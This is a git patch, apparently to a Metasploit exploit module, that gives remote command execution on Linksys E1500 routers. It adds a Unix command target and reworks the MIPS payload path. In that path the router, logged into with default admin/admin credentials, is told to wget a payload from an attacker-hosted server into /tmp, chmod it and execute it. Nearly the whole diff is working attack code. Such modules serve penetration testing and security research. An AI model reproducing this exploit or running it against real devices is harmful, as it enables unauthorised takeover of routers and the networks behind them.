From cfeddf3f3425d468d4f6d8273b64886ede4215dd Mon Sep 17 00:00:00 2001
From: m-1-k-3 <github@s3cur1ty.de>
Date: Fri, 29 Mar 2013 14:43:48 +0100
Subject: [PATCH] cmd payload working, most feedback included

---
 .../linux/http/linksys_e1500_up_exec.rb       | 139 +++++++++++-------
 1 file changed, 82 insertions(+), 57 deletions(-)

diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
index 9a701d3fb8..fd932ebd5a 100644
--- a/modules/exploits/linux/http/linksys_e1500_up_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -30,15 +30,26 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Feb 05 2013',
 			'Privileged'  => true,
-			'Platform'       => [ 'linux' ],
-			'Arch'           => ARCH_MIPSLE,
-			'Targets'        => [[ 'Automatic', { }]],
-			'Payload'      =>
-				{
-					'Space'       => 1024,
-					'DisableNops' => true,
-				},
-			'DefaultTarget'  => 0
+			#'Platform'       => 'linux',
+			#'Arch'           => ARCH_MIPSLE,
+			'Targets'        =>
+				[
+					[ 'Unix CMD',
+						{
+							'Arch' => ARCH_CMD,
+							'Platform' => 'unix',
+							#only payload cmd/unix/generic should be possible
+						}
+					],
+					[ 'Linux Payload',
+						{
+							'Arch' => ARCH_MIPSLE,
+							'Platform' => 'linux',
+							'DisableNops' => true,
+						}
+					],
+				],
+			'DefaultTarget'  => 1,
 			))
 
 		register_options(
@@ -47,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
 				OptString.new('DOWNHOST',  [ false, 'The host to request the MIPS payload from' ]),
-				OptString.new('DOWNFILE',  [ false, 'Filename to download, (default: random)', nil ]),
+				OptString.new('DOWNFILE',  [ false, 'Filename to download, (default: random)' ]),
 				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
 			], self.class)
 	end
 
-	#MISSING - command execution payload
 
 	def request(cmd,user,pass,uri)
 		begin
@@ -91,30 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		rhost = datastore['RHOST']
 		rport = datastore['RPORT']
 
-		# We must regenerate the payload-> not sure if this is the right way
-		arch = "ARCH_MIPSLE"
-		plat = "linux"
-		p = exploit_regenerate_payload(plat, arch)
-		@pl = p.encoded_exe
-
-		#
-		# start our server
-		#
-		resource_uri = '/' + downfile
-		service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-		print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-		start_service({'Uri' => {
-				'Proc' => Proc.new { |cli, req|
-					on_request_uri(cli, req)
-				},
-				'Path' => resource_uri
-			}})
-
-		if (datastore['DOWNHOST'])
-			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-		end
-
-
 		#
 		# testing Login
 		#
@@ -143,36 +129,75 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+		if target.name =~ /CMD/
+			cmd = payload.encoded
+			request(cmd,user,pass,uri)
+		else
+			#lets get some shells ...
 
-		#this filename is used to store the payload on the device
-		filename = rand_text_alpha_lower(8)
+			# We must regenerate the payload-> not sure if this is the right way
+			arch = "ARCH_MIPSLE"
+			plat = "linux"
+			p = exploit_regenerate_payload(plat, arch)
 
-		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
+			@pl = p.encoded_exe
 
-		request(cmd,user,pass,uri)
+			#
+			# start our server
+			#
+			resource_uri = '/' + downfile
 
-		#
-		# chmod
-		#
+			if (datastore['DOWNHOST'])
+				service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+			else
+				#easy way ... do not use SSL ;)
+				if datastore['SSL']
+					ssl_restore = true
+					datastore['SSL'] = false
+				end
 
-		cmd = "chmod 777 /tmp/#{filename}"
+				service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+				print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+				start_service({'Uri' => {
+					'Proc' => Proc.new { |cli, req|
+						on_request_uri(cli, req)
+					},
+					'Path' => resource_uri
+				}})
 
-		print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+				datastore['SSL'] = true if ssl_restore
+			end
 
-		request(cmd,user,pass,uri)
+			print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+	
+			#this filename is used to store the payload on the device
+			filename = rand_text_alpha_lower(8)
+	
+			cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
+	
+			request(cmd,user,pass,uri)
+	
+			#
+			# chmod
+			#
+	
+			cmd = "chmod 777 /tmp/#{filename}"
+	
+			print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+	
+			request(cmd,user,pass,uri)
+	
+			#
+			# execute
+			#
+	
+			cmd = "/tmp/#{filename}"
+	
+			print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+	
+			request(cmd,user,pass,uri)
+		end
 
-		#
-		# execute
-		#
-
-		cmd = "/tmp/#{filename}"
-
-		print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
-
-		request(cmd,user,pass,uri)
-
-		handler
 	end